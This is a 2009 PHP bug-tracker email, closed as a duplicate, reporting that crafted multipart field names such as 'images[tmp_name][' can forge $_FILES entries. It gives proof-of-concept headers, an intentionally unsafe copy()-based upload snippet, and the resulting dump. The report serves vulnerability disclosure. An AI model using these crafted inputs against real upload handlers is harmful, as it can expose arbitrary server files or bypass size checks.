#49683 [Opn->Bgs]: $_FILES overwrite

Sat, 26 Sep 2009 19:52:49 -0700 

 ID:          49683
 Updated by:  [email protected]
 Reported By: adamiwaniuk at gmail dot com
-Status:      Open
+Status:      Bogus
 Bug Type:    Unknown/Other Function
 PHP Version: 5.2.11
 New Comment:

Same problem as already reported in bug #48597


Previous Comments:
------------------------------------------------------------------------

[2009-09-26 21:47:06] adamiwaniuk at gmail dot com

Description:
------------
When 'name' from Content-Disposition ends with '[' or '[xxxxx' it is
possible to prepeare some fake data of $_FILES structure aray
If someone upload multiple files it is possible to set fake size of
file, or when someone is using unsafe method upload (without
is_uploaded_file()/move_uploaded_file()) to set tmp_name to any file

example content:

Content-Disposition: form-data; name="images[[tmp_name]";
filename="file.txt"

Content-Disposition: form-data; name="images[tmp_name][";
filename="index.php"

Reproduce code:
---------------
<?php var_dump($_FILES)?>

<?php

foreach ($_FILES["images"]["tmp_name"] as $key => $name){
        copy($_FILES["images"]["tmp_name"][$key],'upload\\a'.rand().'.txt');
}
?>


<?php
foreach ($_FILES["images"]["tmp_name"] as $key => $name) {
        if ($_FILES["images"]["size"][$key]>0 &&
$_FILES["images"]["size"][$key]<1024)
                
move_uploaded_file($_FILES["images"]["tmp_name"][$key],'upload\\'.rand().'.txt');
}

?>


Expected result:
----------------
it should skip upload file when 'name' ends with [ or '[xxx'

Actual result:
--------------
array(1) {
  ["images"]=>
  array(5) {
    ["name"]=>
    array(1) {
      ["[tmp_name"]=>
      string(5) "file.txt"
    }
    ["type"]=>
    array(1) {
      ["[tmp_name"]=>
      string(10) "text/plain"
    }
    ["tmp_name"]=>
    array(5) {
      ["[tmp_name"]=>
      string(66) "C:\Documents and Settings\Adam\Ustawienia
lokalne\Temp\php36E3.tmp"
      ["[name"]=>
      string(10) "index.php"
      ["[type"]=>
      string(10) "text/plain"
      ["[error"]=>
      int(0)
      ["[size"]=>
      int(11)
    }
    ["error"]=>
    array(1) {
      ["[tmp_name"]=>
      int(0)
    }
    ["size"]=>
    array(1) {
      ["[tmp_name"]=>
      int(3)
    }
  }
}


------------------------------------------------------------------------


-- 
Edit this bug report at http://bugs.php.net/?id=49683&edit=1

Reply via email to